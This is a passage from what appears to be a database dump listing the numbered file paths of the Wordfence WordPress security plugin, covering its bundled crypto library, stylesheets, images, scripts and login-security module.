_compat/namespaced/Core/Poly1305.php'),(742,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php'),(743,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php'),(744,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php'),(745,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php'),(746,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php'),(747,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php'),(748,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php'),(749,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php'),(750,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml'),(751,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml'),(752,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php'),(753,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php'),(754,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php'),(755,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php'),(756,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php'),(757,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php'),(758,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(759,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php'),(760,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php'),(761,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(762,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(763,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(764,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(765,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(766,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),(767,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),(768,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),(769,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),(770,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),(771,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),(772,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),(773,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),(774,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php'),(775,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),(776,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),(777,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),(778,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),(779,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),(780,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),(781,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(782,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(783,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php'),(784,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(785,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(786,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(787,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(788,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(789,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(790,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(791,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(792,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(793,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(794,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(795,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(796,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(797,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(798,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(799,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(800,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php'),(801,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(802,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(803,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(804,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(805,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(806,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(807,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(808,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(809,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php'),(810,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(811,'wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css'),(812,'wp-content/plugins/wordfence/css/diff.1623076348.css'),(813,'wp-content/plugins/wordfence/css/dt_table.1623076348.css'),(814,'wp-content/plugins/wordfence/css/fullLog.1623076348.css'),(815,'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(816,'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(817,'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(818,'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(819,'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(820,'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(821,'wp-content/plugins/wordfence/css/iptraf.1623076348.css'),(822,'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css'),(823,'wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css'),(824,'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css'),(825,'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css'),(826,'wp-content/plugins/wordfence/css/main.1623076348.css'),(827,'wp-content/plugins/wordfence/css/phpinfo.1623076348.css'),(828,'wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css'),(829,'wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css'),(830,'wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css'),(831,'wp-content/plugins/wordfence/css/wf-global.1623076348.css'),(832,'wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css'),(833,'wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css'),(834,'wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css'),(835,'wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css'),(836,'wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css'),(837,'wp-content/plugins/wordfence/images/2fa-whole.svg'),(838,'wp-content/plugins/wordfence/images/2fa1.svg'),(839,'wp-content/plugins/wordfence/images/2fa2.svg'),(840,'wp-content/plugins/wordfence/images/back_disabled.jpg'),(841,'wp-content/plugins/wordfence/images/back_enabled.jpg'),(842,'wp-content/plugins/wordfence/images/blocking.svg'),(843,'wp-content/plugins/wordfence/images/button-grad-grey.png'),(844,'wp-content/plugins/wordfence/images/checkbox.png'),(845,'wp-content/plugins/wordfence/images/flags.png'),(846,'wp-content/plugins/wordfence/images/forward_disabled.jpg'),(847,'wp-content/plugins/wordfence/images/forward_enabled.jpg'),(848,'wp-content/plugins/wordfence/images/help.png'),(849,'wp-content/plugins/wordfence/images/icons/ajax24.gif'),(850,'wp-content/plugins/wordfence/images/icons/ajax3.gif'),(851,'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(852,'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(853,'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(854,'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(855,'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(856,'wp-content/plugins/wordfence/images/icons/email_go.png'),(857,'wp-content/plugins/wordfence/images/icons/error128.png'),(858,'wp-content/plugins/wordfence/images/icons/magnifier.png'),(859,'wp-content/plugins/wordfence/images/icons/tick128.png'),(860,'wp-content/plugins/wordfence/images/icons/warning128.png'),(861,'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(862,'wp-content/plugins/wordfence/images/lightbox-controls.png'),(863,'wp-content/plugins/wordfence/images/loading.gif'),(864,'wp-content/plugins/wordfence/images/loading_background.png'),(865,'wp-content/plugins/wordfence/images/loading_large.gif'),(866,'wp-content/plugins/wordfence/images/logo.png'),(867,'wp-content/plugins/wordfence/images/options.svg'),(868,'wp-content/plugins/wordfence/images/ratelimiting.svg'),(869,'wp-content/plugins/wordfence/images/sort_asc.gif'),(870,'wp-content/plugins/wordfence/images/sort_asc.png'),(871,'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(872,'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(873,'wp-content/plugins/wordfence/images/sort_both.gif'),(874,'wp-content/plugins/wordfence/images/sort_both.png'),(875,'wp-content/plugins/wordfence/images/sort_desc.gif'),(876,'wp-content/plugins/wordfence/images/sort_desc.png'),(877,'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(878,'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(879,'wp-content/plugins/wordfence/images/support.svg'),(880,'wp-content/plugins/wordfence/images/tools.svg'),(881,'wp-content/plugins/wordfence/images/wf-central-logo.svg'),(882,'wp-content/plugins/wordfence/images/wf-error-badge.svg'),(883,'wp-content/plugins/wordfence/images/wf-horizontal.svg'),(884,'wp-content/plugins/wordfence/images/wordfence-logo.svg'),(885,'wp-content/plugins/wordfence/index.php'),(886,'wp-content/plugins/wordfence/js/Chart.bundle.min.1623076348.js'),(887,'wp-content/plugins/wordfence/js/admin.1623076348.js'),(888,'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js'),(889,'wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js'),(890,'wp-content/plugins/wordfence/js/date.1623076348.js'),(891,'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js'),(892,'wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js'),(893,'wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js'),(894,'wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js'),(895,'wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js'),(896,'wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js'),(897,'wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js'),(898,'wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js'),(899,'wp-content/plugins/wordfence/js/wfdashboard.1623076348.js'),(900,'wp-content/plugins/wordfence/js/wfdropdown.1623076348.js'),(901,'wp-content/plugins/wordfence/js/wfglobal.1623076348.js'),(902,'wp-content/plugins/wordfence/js/wfi18n.1623076348.js'),(903,'wp-content/plugins/wordfence/js/wfpopover.1623076348.js'),(904,'wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js'),(905,'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(906,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(907,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(908,'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(909,'wp-content/plugins/wordfence/lib/Diff.php'),(910,'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(911,'wp-content/plugins/wordfence/lib/IPTraf.php'),(912,'wp-content/plugins/wordfence/lib/IPTrafList.php'),(913,'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(914,'wp-content/plugins/wordfence/lib/compat.php'),(915,'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(916,'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(917,'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),(918,'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),(919,'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),(920,'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),(921,'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),(922,'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),(923,'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),(924,'wp-content/plugins/wordfence/lib/diffResult.php'),(925,'wp-content/plugins/wordfence/lib/email_genericAlert.php'),(926,'wp-content/plugins/wordfence/lib/email_newIssues.php'),(927,'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),(928,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(929,'wp-content/plugins/wordfence/lib/flags.php'),(930,'wp-content/plugins/wordfence/lib/live_activity.php'),(931,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(932,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(933,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(934,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(935,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(936,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(937,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(938,'wp-content/plugins/wordfence/lib/menu_options.php'),(939,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(940,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(941,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(942,'wp-content/plugins/wordfence/lib/menu_support.php'),(943,'wp-content/plugins/wordfence/lib/menu_tools.php'),(944,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(945,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(946,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(947,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(948,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(949,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(950,'wp-content/plugins/wordfence/lib/noc1.key'),(951,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(952,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(953,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(954,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(955,'wp-content/plugins/wordfence/lib/sysinfo.php'),(956,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(957,'wp-content/plugins/wordfence/lib/wf503.php'),(958,'wp-content/plugins/wordfence/lib/wfAPI.php'),(959,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(960,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(961,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(962,'wp-content/plugins/wordfence/lib/wfArray.php'),(963,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(964,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(965,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(966,'wp-content/plugins/wordfence/lib/wfCache.php'),(967,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(968,'wp-content/plugins/wordfence/lib/wfConfig.php'),(969,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(970,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(971,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(972,'wp-content/plugins/wordfence/lib/wfDB.php'),(973,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(974,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(975,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(976,'wp-content/plugins/wordfence/lib/wfDict.php'),(977,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(978,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(979,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(980,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(981,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(982,'wp-content/plugins/wordfence/lib/wfIssues.php'),(983,'wp-content/plugins/wordfence/lib/wfJWT.php'),(984,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(985,'wp-content/plugins/wordfence/lib/wfLog.php'),(986,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(987,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(988,'wp-content/plugins/wordfence/lib/wfNotification.php'),(989,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(990,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(991,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(992,'wp-content/plugins/wordfence/lib/wfScan.php'),(993,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(994,'wp-content/plugins/wordfence/lib/wfSchema.php'),(995,'wp-content/plugins/wordfence/lib/wfStyle.php'),(996,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(997,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(998,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(999,'wp-content/plugins/wordfence/lib/wfUtils.php'),(1000,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(1001,'wp-content/plugins/wordfence/lib/wfView.php'),(1002,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(1003,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(1004,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(1005,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(1006,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(1007,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(1008,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(1009,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(1010,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(1011,'wp-content/plugins/wordfence/models/common/wfTab.php'),(1012,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(1013,'wp-content/plugins/wordfence/models/page/wfPage.php'),(1014,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(1015,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(1016,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(1017,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(1018,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(1019,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(1020,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(1021,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(1022,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(1023,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(1024,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(1025,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(1026,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(1027,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(1028,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(1029,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(1030,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(1031,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(1032,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(1033,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(1034,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(1035,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(1036,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(1037,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(1038,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(1039,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(1040,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(1041,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(1042,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(1043,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(1044,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(1045,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(1046,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css'),(1047,'wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css'),(1048,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css'),(1049,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css'),(1050,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css'),(1051,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css'),(1052,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css'),(1053,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css'),(1054,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css'),(1055,'wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css'),(1056,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(1057,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(1058,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(1059,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(1060,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(1061,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(1062,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(1063,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(1064,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(1065,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(1066,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(1067,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js'),(1068,'wp-content/plugins/wordfence/modules/login-security/js/admin.1623076348.js'),(1069,'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js'),(1070,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js'),(1071,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js'),(1072,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js'),(1073,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js'),(1074,'wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js'),(1075,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(1076,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(1077,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(1078,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(1079,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(1080,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(1081,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(1082,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(1083,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(1084,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(1085,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(1086,'wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php'),(1087,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(1088,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(1089,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(1090,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(1091,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(1092,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(1093,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(1094,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(1095,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(1096,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(1097,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(1098,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(1099,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(1100,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(1101,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(1102,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(1103,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(1104,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(1105,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(1106,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(1107,'wp-content/plugins/wordfence/readme.txt'),(1108,'wp-content/plugins/wordfence/vendor/autoload.php'),(1109,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(1110,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(1111,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(1112,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(1113,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(1114,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(1115,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(1116,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(1117,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(1118,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(1119,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(1120,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(1121,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(1122,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(1123,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(1124,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(1125,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(1126,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(1127,'wp-content/plugins/